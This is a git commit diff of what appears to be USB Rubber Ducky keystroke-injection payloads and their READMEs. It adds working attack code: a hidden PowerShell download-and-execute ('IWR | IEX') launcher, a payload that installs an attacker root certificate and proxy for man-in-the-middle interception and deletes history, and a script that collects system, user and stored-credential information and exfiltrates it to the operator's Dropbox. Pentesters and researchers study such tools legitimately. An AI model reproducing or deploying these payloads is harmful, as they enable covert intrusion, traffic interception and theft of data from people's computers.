commit
1bdf62bc7e
|
@ -0,0 +1,43 @@
|
|||
EXTENSION POWERSHELL_TO_DROPBOX
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Title: PowerShell To Dropbox
|
||||
Author: PlumpyTurkey
|
||||
Description: This extension allows you to exfiltrate content available from PowerShell to a file in your Dropbox.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.1
|
||||
END_REM
|
||||
|
||||
REM Required options:
|
||||
DEFINE #PTD_CONTENT $Content
|
||||
DEFINE #PTD_REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
DEFINE #PTD_APP_KEY XXXXXXXXXXXXXXX
|
||||
DEFINE #PTD_APP_SECRET XXXXXXXXXXXXXXX
|
||||
|
||||
REM Advanced options:
|
||||
DEFINE #PTD_OUTPUT_FOLDER Exfiltrated-content
|
||||
DEFINE #PTD_OUTPUT_FILE [${env:COMPUTERNAME}-${env:USERNAME}].txt
|
||||
|
||||
FUNCTION PTD_SEND()
|
||||
STRING_POWERSHELL
|
||||
try {
|
||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
||||
"Authorization" = "Bearer $((
|
||||
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
||||
"Content-Type" = "application/x-www-form-urlencoded"
|
||||
} -Body @{
|
||||
"grant_type" = "refresh_token";
|
||||
"refresh_token" = "#PTD_REFRESH_TOKEN";
|
||||
"client_id" = "#PTD_APP_KEY";
|
||||
"client_secret" = "#PTD_APP_SECRET"
|
||||
}
|
||||
).access_token)";
|
||||
"Content-Type" = "application/octet-stream";
|
||||
"Dropbox-API-Arg" = "{""path"":""/#PTD_OUTPUT_FOLDER/#PTD_OUTPUT_FILE"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
||||
} -Body #PTD_CONTENT | Out-Null
|
||||
}
|
||||
catch {
|
||||
Write-Host "An error occurred: $_"
|
||||
}
|
||||
END_STRING
|
||||
END_FUNCTION
|
||||
END_EXTENSION
|
|
@ -1,25 +0,0 @@
|
|||
EXTENSION PowerShell_To_Dropbox
|
||||
|
||||
REM Title: PowerShell_To_Dropbox
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This DuckyScript extension exfiltrates data (for example the result of a command) from the target computer by submitting a file to your Dropbox.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM For usage instructions look at https://github.com/Who-Is-Julien/Ducky-Utilities/blob/main/PowerShell_To_Dropbox/README.md
|
||||
|
||||
|
||||
DEFINE REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
DEFINE APP_KEY XXXXXXXXXXXXXXX
|
||||
DEFINE APP_SECRET XXXXXXXXXXXXXXX
|
||||
|
||||
STRING Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "
|
||||
STRING REFRESH_TOKEN
|
||||
STRING "; client_id = "
|
||||
STRING APP_KEY
|
||||
STRING "; client_secret = "
|
||||
STRING APP_SECRET
|
||||
STRING "}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body $report | Out-Null
|
||||
DELAY 500
|
||||
ENTER
|
||||
|
||||
END_EXTENSION
|
|
@ -0,0 +1,34 @@
|
|||
EXTENSION RUN_HOSTED_POWERSHELL
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Title: Run Hosted PowerShell
|
||||
Author: PlumpyTurkey
|
||||
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.0
|
||||
END_REM
|
||||
|
||||
REM Required options:
|
||||
DEFINE #RHP_SCRIPT_URL example.com
|
||||
|
||||
REM Advanced options:
|
||||
DEFINE #RHP_DELAY 2000
|
||||
DEFINE #RHP_ELEVATED_EXECUTION FALSE
|
||||
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
||||
|
||||
GUI r
|
||||
|
||||
DELAY #RHP_DELAY
|
||||
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
||||
|
||||
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
|
||||
CTRL SHIFT ENTER
|
||||
DELAY #RHP_DELAY
|
||||
LEFT
|
||||
END_IF_DEFINED
|
||||
|
||||
ENTER
|
||||
|
||||
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
|
||||
ATTACKMODE OFF
|
||||
END_IF_DEFINED
|
||||
END_EXTENSION
|
|
@ -0,0 +1,59 @@
|
|||
# Windows Duck In The Middle
|
||||
|
||||
<p>
|
||||
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/execution/Windows-Duck-In-The-Middle/payload.txt">
|
||||
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="VERSION: 1.0" src="https://img.shields.io/badge/VERSION-1.0-green?style=for-the-badge">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
This payload sets up a trustworthy proxy for the user, enabling a [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack). After executing your payload, the proxy server will intercept all the target user's network traffic.
|
||||
|
||||
## Process
|
||||
|
||||
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
||||
2. Creates a new virtual desktop.
|
||||
3. Opens a PowerShell window using the Windows+X menu.
|
||||
4. Runs PowerShell code that performs the following actions:
|
||||
- Downloads your certificate to a temporary file.
|
||||
- *Configures Firefox to accepts root user certificates for each profile.*
|
||||
- Configures and activates the proxy for the current user.
|
||||
- Deletes the temporary certificate file and PowerShell history, then closes the window.
|
||||
5. Confirms the addition of a trusted certificate in the confirmation dialog box.
|
||||
6. Closes the virtual desktop.
|
||||
7. *Disables USB Rubber Ducky*
|
||||
|
||||
> [!NOTE]
|
||||
> No configuration is required for Chromium-based browsers since they accept user root certificates by default.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
To use this payload, you'll need a proxy server and a [root certificate](https://en.wikipedia.org/wiki/Root_certificate). The certificate must be downloadable from a website, either from your proxy server or from an online file hosting service such as [Dropbox](https://www.dropbox.com/). You can easily generate the certificate using tools such as [mitmproxy](https://mitmproxy.org/) or [Burp Suite](https://portswigger.net/burp).
|
||||
|
||||
> [!WARNING]
|
||||
> To ensure the payload functions properly, generate the "mitmproxy-ca-cert.pem" certificate in the "Other platforms" section when using mitmproxy.
|
||||
|
||||
## Options
|
||||
|
||||
|Required options|Data type|Default value|Description|
|
||||
|-|-|-|-|
|
||||
|CERT_URL|String|example.com|The download link for your Trusted Root CA certificate|
|
||||
|PROXY_IP|String|127.0.0.1|Your proxy's IP address|
|
||||
|PROXY_PORT|Integer|8080|Your proxy port|
|
||||
|
||||
|Advanced options|Data type|Default value|Description|
|
||||
|-|-|-|-|
|
||||
|SHORT_DELAY|Integer|500|Short delay time|
|
||||
|MEDIUM_DELAY|Integer|2000|Medium delay time|
|
||||
|LONG_DELAY|Integer|4000|Long delay time|
|
||||
|CONFIGURE_FIREFOX|Boolean|TRUE|Configures Firefox to accepts root user certificates for each profile|
|
||||
|DISABLE_AFTER_EXECUTION|Boolean|TRUE|Disables USB Rubber Ducky after payload execution|
|
||||
|
||||
## Contributors
|
||||
|
||||
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)
|
|
@ -0,0 +1,136 @@
|
|||
REM_BLOCK DOCUMENTATION
|
||||
Title: Windows Duck In The Middle
|
||||
Author: PlumpyTurkey
|
||||
Description: This payload sets up a trustworthy proxy for the user, enabling a Man-in-the-middle attack.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.0
|
||||
Category: Execution
|
||||
END_REM
|
||||
|
||||
REM Required options:
|
||||
DEFINE #CERT_URL example.com
|
||||
DEFINE #PROXY_IP 127.0.0.1
|
||||
DEFINE #PROXY_PORT 8080
|
||||
|
||||
REM Advanced options:
|
||||
DEFINE #SHORT_DELAY 500
|
||||
DEFINE #MEDIUM_DELAY 2000
|
||||
DEFINE #LONG_DELAY 4000
|
||||
DEFINE #CONFIGURE_FIREFOX TRUE
|
||||
DEFINE #DISABLE_AFTER_EXECUTION TRUE
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION WINDOWS_ONLY
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: Korben
|
||||
|
||||
DEFINE #FAILURE_LED TRUE
|
||||
DEFINE #FAILURE_LED_MODE LED_R
|
||||
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
|
||||
|
||||
IF (($_OS == WINDOWS) == FALSE) THEN
|
||||
IF_DEFINED_TRUE #FAILURE_LED
|
||||
#FAILURE_LED_MODE
|
||||
DELAY 500
|
||||
#FAILURE_LED_MODE
|
||||
DELAY 500
|
||||
#FAILURE_LED_MODE
|
||||
END_IF_DEFINED
|
||||
#FAILURE_ATTACKMODE
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
CTRL GUI d
|
||||
GUI x
|
||||
|
||||
DELAY #SHORT_DELAY
|
||||
STRING i
|
||||
|
||||
DELAY #MEDIUM_DELAY
|
||||
STRING_POWERSHELL
|
||||
Clear-Host;
|
||||
$c = New-TemporaryFile;
|
||||
try {
|
||||
Invoke-WebRequest -UseBasicParsing -Uri "#CERT_URL" -OutFile $c;
|
||||
Import-Certificate -FilePath $c -CertStoreLocation "Cert:\CurrentUser\Root";
|
||||
END_STRING
|
||||
|
||||
IF_DEFINED_TRUE #CONFIGURE_FIREFOX
|
||||
STRING_POWERSHELL
|
||||
if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles") {
|
||||
Get-ChildItem -Path "$env:APPDATA\Mozilla\Firefox\Profiles" -Filter "prefs.js" -Recurse | ForEach-Object {
|
||||
(Get-Content $_.FullName) -replace '"security.enterprise_roots.enabled", false','"security.enterprise_roots.enabled", true' | Set-Content $_.FullName
|
||||
}
|
||||
};
|
||||
END_STRING
|
||||
END_IF_DEFINED
|
||||
|
||||
STRING_POWERSHELL
|
||||
@{ "ProxyServer" = "#PROXY_IP:#PROXY_PORT"; "ProxyEnable" = "1" }.GetEnumerator() | ForEach-Object {
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name $_.Name -Value $_.Value
|
||||
}
|
||||
}
|
||||
finally {
|
||||
Remove-Item $c;
|
||||
Remove-Item (Get-PSReadLineOption).HistorySavePath;
|
||||
exit
|
||||
}
|
||||
END_STRING
|
||||
|
||||
ENTER
|
||||
|
||||
DELAY #LONG_DELAY
|
||||
ALT TAB
|
||||
|
||||
DELAY #SHORT_DELAY
|
||||
TAB
|
||||
ENTER
|
||||
|
||||
CTRL GUI F4
|
||||
|
||||
IF_DEFINED_TRUE #DISABLE_AFTER_EXECUTION
|
||||
ATTACKMODE OFF
|
||||
END_IF_DEFINED
|
|
@ -1,19 +0,0 @@
|
|||
- **Configure your Dropbox application**
|
||||
|
||||
- Create a Dropbox account.
|
||||
- [Create a Dropbox "App"](https://www.dropbox.com/developers/apps/create) with a "Scoped access" API and a "Full Dropbox" access.
|
||||
- Go to the settings of this app and write down your "App key" and "App secret".
|
||||
*These are your "<APP_KEY>" and "<APP_SECRET>".*
|
||||
- Next, go to the "Permissions" tab and enable the "files.metadata.write" and "files.content.write" permissions.
|
||||
- After that, open this link in your browser *(values between brackets must be changed)*.
|
||||
```
|
||||
https://www.dropbox.com/oauth2/authorize?client_id=<APP_KEY>&token_access_type=offline&response_type=code
|
||||
```
|
||||
- Connect your application, allow its permissions, and note the code it gives you.
|
||||
*This is your "<APP_CODE>".*
|
||||
- Open a command prompt and run this command *(values between brackets must be changed)*.
|
||||
```
|
||||
curl https://api.dropbox.com/oauth2/token -d code=<APP_CODE> -d grant_type=authorization_code -u <APP_KEY>:<APP_SECRET>
|
||||
```
|
||||
- Note the "refresh_token" value of the result.
|
||||
*This is your "<REFRESH_TOKEN>".*
|
|
@ -1,48 +1,48 @@
|
|||
<h1 align="center">
|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Privilege+Excalibur+🪟🗡️">
|
||||
</a>
|
||||
</h1>
|
||||
## Windows Privilege Excalibur
|
||||
|
||||
## Description
|
||||
<p>
|
||||
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt">
|
||||
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
|
||||
</a>
|
||||
<a href="#">
|
||||
<img alt="VERSION: 1.3" src="https://img.shields.io/badge/VERSION-1.3-green?style=for-the-badge">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
This payload exfiltrates Windows system information, user information, stored credentials and installed programs from the target computer to Dropbox for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
|
||||
This payload sends you a brief user privilege escalation report via Dropbox. Once you have the report, you can perform further privilege escalation analysis, including using the following resources:
|
||||
|
||||
*The setup needs to be done only once for the payload to work forever.*
|
||||
|Report Category|Useful Resources|
|
||||
|-|-|
|
||||
|System Information|[WES-NG](https://github.com/bitsadmin/wesng)|
|
||||
|User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)|
|
||||
|Stored Credentials||
|
||||
|Installed Programs|[Exploit Database](https://www.exploit-db.com/) & [Packet Storm](https://packetstormsecurity.com/)|
|
||||
|
||||
## Setup
|
||||
## Process
|
||||
|
||||
> If you already have your <APP_KEY>, <APP_SECRET> and <REFRESH_TOKEN>, you can go directly to the "Prepare your payload" step.
|
||||
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
||||
2. Opens a Windows Run dialog box.
|
||||
3. Executes a hosted PowerShell script that performs the following actions:
|
||||
- Clears the history of the Windows Run menu.
|
||||
- Prepares a report on target PC user privilege escalation.
|
||||
- Sends the report to a file in your Dropbox.
|
||||
|
||||
- **Configure your Dropbox application**
|
||||
## Prerequisites
|
||||
|
||||
- Follow the instructions in "[DROPBOXSETUP.md](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/DROPBOXSETUP.md)".
|
||||
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
|
||||
|
||||
- **Prepare your payload**
|
||||
> [!WARNING]
|
||||
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
|
||||
|
||||
- Download the Powershell script "script.ps1".
|
||||
- Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application.
|
||||
- Upload your modified "script.ps1" file to Dropbox and copy the upload link.
|
||||
- Replace the end of the link from "?dl=0" to "?dl=1"
|
||||
*This is your "<DOWNLOAD_LINK>".*
|
||||
- Download the "payload.txt" file.
|
||||
- Edit it to include your <DOWNLOAD_LINK>.
|
||||
## Options
|
||||
|
||||
## Analysis
|
||||
|Required extension options|Extension|Data type|Default value|Description|
|
||||
|-|-|-|-|-|
|
||||
|RHP_SCRIPT_URL|Run Hosted PowerShell|String|example.com|Your PowerShell script download link|
|
||||
|
||||
Once you have your report file, you can use the following resources to help you find ways to escalate your privileges:
|
||||
## Contributors
|
||||
|
||||
| Report Category | Useful Resources |
|
||||
| --- | --- |
|
||||
| System Information | [WES-NG](https://github.com/bitsadmin/wesng) |
|
||||
| User Information | [Priv2Admin](https://github.com/gtworek/Priv2Admin) |
|
||||
| Stored Credentials | |
|
||||
| Installed Programs | [Exploit Database](https://www.exploit-db.com) & [Packet Storm](https://packetstormsecurity.com) |
|
||||
|
||||
#### Coming soon...
|
||||
|
||||
- [ ] Windows Services Misconfigurations
|
||||
|
||||
---
|
||||
|
||||
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*
|
||||
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)
|
||||
|
|
|
@ -1,17 +1,107 @@
|
|||
REM Title: Windows Privilege Excalibur
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrates Windows system information, user information, stored credentials and installed programs from the target computer to Dropbox for subsequent privilege escalation analysis.
|
||||
REM Target: Windows 10, 11
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Title: Windows Privilege Excalibur
|
||||
Author: PlumpyTurkey
|
||||
Description: This payload sends you a brief user privilege escalation report via Dropbox.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.3
|
||||
Category: Exfiltration
|
||||
END_REM
|
||||
|
||||
REM Replace DOWNLOAD_LINK with the actual download link of the script.
|
||||
DEFINE DOWNLOAD_LINK example.com
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
|
||||
STRING DOWNLOAD_LINK
|
||||
STRING ; iex $pl
|
||||
DELAY 500
|
||||
ENTER
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION WINDOWS_ONLY
|
||||
REM VERSION 1.0
|
||||
REM AUTHOR: Korben
|
||||
|
||||
DEFINE #FAILURE_LED TRUE
|
||||
DEFINE #FAILURE_LED_MODE LED_R
|
||||
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
|
||||
|
||||
IF (($_OS == WINDOWS) == FALSE) THEN
|
||||
IF_DEFINED_TRUE #FAILURE_LED
|
||||
#FAILURE_LED_MODE
|
||||
DELAY 500
|
||||
#FAILURE_LED_MODE
|
||||
DELAY 500
|
||||
#FAILURE_LED_MODE
|
||||
END_IF_DEFINED
|
||||
#FAILURE_ATTACKMODE
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION RUN_HOSTED_POWERSHELL
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Title: Run Hosted PowerShell
|
||||
Author: PlumpyTurkey
|
||||
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
|
||||
Target: Windows 10, 11
|
||||
Version: 1.0
|
||||
END_REM
|
||||
|
||||
REM Required options:
|
||||
DEFINE #RHP_SCRIPT_URL example.com
|
||||
|
||||
REM Advanced options:
|
||||
DEFINE #RHP_DELAY 2000
|
||||
DEFINE #RHP_ELEVATED_EXECUTION FALSE
|
||||
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
||||
|
||||
GUI r
|
||||
|
||||
DELAY #RHP_DELAY
|
||||
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
||||
|
||||
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
|
||||
CTRL SHIFT ENTER
|
||||
DELAY #RHP_DELAY
|
||||
LEFT
|
||||
END_IF_DEFINED
|
||||
|
||||
ENTER
|
||||
|
||||
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
|
||||
ATTACKMODE OFF
|
||||
END_IF_DEFINED
|
||||
END_EXTENSION
|
||||
|
|
|
@ -1,6 +1,49 @@
|
|||
#Replace <APP_KEY> with the actual "App Key" of your app.
|
||||
#Replace <APP_SECRET> with the actual "App Secret" of your app.
|
||||
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
|
||||
$REFRESH_TOKEN = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||
$APP_KEY = "XXXXXXXXXXXXXXX"
|
||||
$APP_SECRET = "XXXXXXXXXXXXXXX"
|
||||
|
||||
function Send-ToDropbox {
|
||||
[CmdletBinding()]
|
||||
param(
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$Content,
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$RefreshToken,
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$AppKey,
|
||||
[Parameter(Mandatory = $true)]
|
||||
[string]$AppSecret,
|
||||
[string]$OutputFolder = "Exfiltrated-content",
|
||||
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
|
||||
)
|
||||
|
||||
try {
|
||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
||||
"Authorization" = "Bearer $((
|
||||
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
||||
"Content-Type" = "application/x-www-form-urlencoded"
|
||||
} -Body @{
|
||||
"grant_type" = "refresh_token";
|
||||
"refresh_token" = $RefreshToken;
|
||||
"client_id" = $AppKey;
|
||||
"client_secret" = $AppSecret
|
||||
}
|
||||
).access_token)";
|
||||
"Content-Type" = "application/octet-stream";
|
||||
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
||||
} -Body $Content | Out-Null
|
||||
}
|
||||
catch {
|
||||
Write-Host "An error occurred: $_"
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "# System Information #`n $(SYSTEMINFO | Out-String) `n# User Information #`n $(WHOAMI /ALL | Out-String) `n# Stored Credentials #`n $(CMDKEY /LIST | Out-String) `n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
$Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n"
|
||||
$Report += "*** User Information ***`n $(WHOAMI /ALL | Out-String)`n"
|
||||
$Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n"
|
||||
$Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
|
||||
|
||||
Send-ToDropbox -Content $Report -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET
|
||||
|
|
|
@ -1,49 +0,0 @@
|
|||
#Replace <APP_KEY> with the actual "App Key" of your app.
|
||||
#Replace <APP_SECRET> with the actual "App Secret" of your app.
|
||||
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
|
||||
|
||||
|
||||
#Clear windows run dialog history
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
#Define the headers required for the access token request
|
||||
|
||||
$headers = @{
|
||||
"Content-Type" = "application/x-www-form-urlencoded"
|
||||
}
|
||||
|
||||
#Define the parameters for the access token request
|
||||
|
||||
$body = @{
|
||||
grant_type = "refresh_token"
|
||||
refresh_token = "<REFRESH_TOKEN>"
|
||||
client_id = "<APP_KEY>"
|
||||
client_secret = "<APP_SECRET>"
|
||||
}
|
||||
|
||||
#Request an access token from Dropbox using the body and headers defined above
|
||||
|
||||
$access_token_response = Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers $headers -Body $body
|
||||
$access_token = $access_token_response.access_token
|
||||
|
||||
#Define headers for the file upload
|
||||
|
||||
$headers = @{
|
||||
"Authorization" = "Bearer $access_token"
|
||||
"Content-Type" = "application/octet-stream"
|
||||
"Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'
|
||||
}
|
||||
|
||||
#Define the report for the file upload
|
||||
|
||||
$body = "# System Information #`n $(SYSTEMINFO | Out-String)"
|
||||
|
||||
$body += "`n# User Information #`n $(WHOAMI /ALL | Out-String)"
|
||||
|
||||
$body += "`n# Stored Credentials #`n $(CMDKEY /LIST | Out-String)"
|
||||
|
||||
$body += "`n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
|
||||
|
||||
#Upload the report to Dropbox using the headers and body defined above
|
||||
|
||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers $headers -Body $body | Out-Null
|
|
@ -1,34 +0,0 @@
|
|||
<h1 align="center">
